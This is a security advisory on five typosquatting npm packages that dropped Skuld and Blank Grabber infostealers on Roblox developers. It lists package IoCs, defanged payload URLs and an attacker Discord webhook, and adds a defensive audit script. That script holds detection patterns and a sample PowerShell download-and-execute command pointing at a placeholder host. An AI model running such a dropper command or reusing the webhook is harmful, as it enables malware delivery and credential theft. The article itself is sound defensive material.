Roblox Devs Targeted with Malicious npm Packages


Researchers found five malicious npm packages targeting Roblox developers, stealing credentials and personal data. These packages, including autoadv, ro.dll, node-dlls, and two rolimons-api versions, mimic legitimate modules commonly used by the Roblox community.

Malicious npm Packages

As of Q2 2024, Roblox had 79.5 million daily active users, with 58% aged 13 or older, and 2.6 million developers. Its popularity makes it a prime target for cybercriminals seeking sensitive information or unauthorized access to accounts.

The threat actor published a fake package, node-dlls, typosquatting the popular node-dll package, which has been downloaded over 35,800 times. Similarly, the rolimons-api@1.1.0 and rolimons-api@1.1.2 packages mimicked Rolimon's API Module, a tool widely used by Roblox developers.

These malicious packages, designed to exploit developers’ trust in familiar names, contained obfuscated code that downloaded and executed Skuld infostealer and Blank Grabber malware.

The Skuld infostealer, written in Go, is designed to steal sensitive data from Windows systems, including information from Discord, Chromium-based browsers, Firefox, and cryptocurrency wallets.

Blank Grabber, a Python-based malware, also steals data from affected Windows computers. Its user-friendly interface allows attackers to change the malware’s behavior, bypass User Account Control (UAC), or disable Windows Defender.

The attacker receives stolen data via Telegram or Discord webhooks. The malicious npm packages contained obfuscated JavaScript code designed to download and execute harmful files from external sources.

The malicious packages contain a downloadAndRun function that fetches and executes the payload using PowerShell commands. This let the attacker run malicious code on the victim's computer silently, without triggering immediate alarms, effectively creating a backdoor.

Through this backdoor, the attacker deployed two types of malware: Skuld infostealer and Blank Grabber. These malware variants were designed to steal sensitive information, such as login credentials, bank account details, and personal files, all without the victim’s knowledge.

In early 2024, Socket revealed another campaign involving malicious packages impersonating the official noblox.js and noblox.js-server packages. Researchers noted that these repeated attacks highlight an ongoing threat, as attackers exploit the Roblox platform's popularity and developers' reliance on open-source code. To stay safe, carefully verify package names, review third-party code, and use security tools to detect harmful packages.
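As an added example (not code from the article or from Socket), the audit below turns the advice above into a check a team can run over its dependency tree: it flags the exact package@version IoCs listed in this article, names within one edit of a legitimate package the team relies on (the node-dlls vs node-dll typosquat), and package source or install scripts that contain several download-and-execute indicators of the kind the downloadAndRun function used. The two sample manifests and the trusted-name list are constructed for the demo.

```javascript
// Exact package@version IoCs from the article.
const KNOWN_BAD = new Set(["node-dlls@1.0.0", "ro.dll@1.0.0", "autoadv@1.0.0",
  "rolimons-api@1.1.0", "rolimons-api@1.1.2"]);
// Legitimate packages named in the article; a real allowlist comes from your own lockfile.
const TRUSTED = ["node-dll", "noblox.js", "noblox.js-server"];
// Lifecycle hooks that npm runs automatically on install.
const HOOKS = ["preinstall", "install", "postinstall"];
// Indicators of a PowerShell download-and-execute chain; two or more in one file is flagged.
const DOWNLOAD_EXEC = [/powershell(\.exe)?/i, /Invoke-WebRequest|iwr\b/i,
  /DownloadFile|DownloadString/i, /Start-Process/i, /-w(indowstyle)?\s+hidden/i,
  /-e(nc|ncodedcommand)?\b/i, /child_process/, /\.exe\b/i];

// Levenshtein distance, used to catch one-character typosquats.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1,
        d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return d[a.length][b.length];
}

// Audits one package manifest plus its source files; returns a list of findings.
function auditPackage(manifest, sources = {}) {
  const findings = [];
  const id = `${manifest.name}@${manifest.version}`;
  if (KNOWN_BAD.has(id)) findings.push(`known-malicious: ${id}`);
  for (const t of TRUSTED)
    if (manifest.name !== t && editDistance(manifest.name, t) === 1)
      findings.push(`possible-typosquat: ${manifest.name} ~ ${t}`);
  const texts = Object.entries(sources);
  for (const h of HOOKS)
    if (manifest.scripts?.[h]) texts.push([`scripts.${h}`, manifest.scripts[h]]);
  for (const [where, text] of texts) {
    const hits = DOWNLOAD_EXEC.filter((re) => re.test(text));
    if (hits.length >= 2) findings.push(`download-and-execute: ${where} (${hits.length} indicators)`);
  }
  return findings;
}

// Constructed samples: a benign package and a typosquat carrying a PowerShell dropper stub.
const benign = auditPackage({ name: "node-dll", version: "1.0.0" },
  { "index.js": "module.exports = require('./lib');" });
const bad = auditPackage({ name: "node-dlls", version: "1.0.0", scripts: { postinstall: "node index.js" } },
  { "index.js": "exec('powershell -w hidden -c \"Invoke-WebRequest http://example.invalid/x.exe -OutFile x.exe; Start-Process x.exe\"')" });
console.log({ benign, bad });
```

In practice, iterate over every package.json under node_modules (or the entries of package-lock.json) and treat any non-empty result as a build failure.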

Indicators Of Compromise (IOCs)

Malicious Packages:

  • node-dlls@1.0.0
  • ro.dll@1.0.0
  • autoadv@1.0.0
  • rolimons-api@1.1.0
  • rolimons-api@1.1.2

Malicious URLs:

  • hxxps://github[.]com/zvydev/code/raw/main/RobloxPlayerLauncher.exe
  • hxxps://github[.]com/zvydev/code/raw/main/cmd.exe
  • hxxps://github[.]com/zvydev/code

Discord Webhook:

hxxps://discord[.]com/api/webhooks/1298438839865577564/LcdRm0rKPE01ApFPl9RQHGqhcuExeiqKGpghrB8Lv3iKniiyEa0mVBhFySte_oBx7wyQ


Published November 12th, 2024 | BOTNET, Compromised, Exploitation, Security Advisory, Security Update

About the Author:

FirstHackersNews- Identifies Security
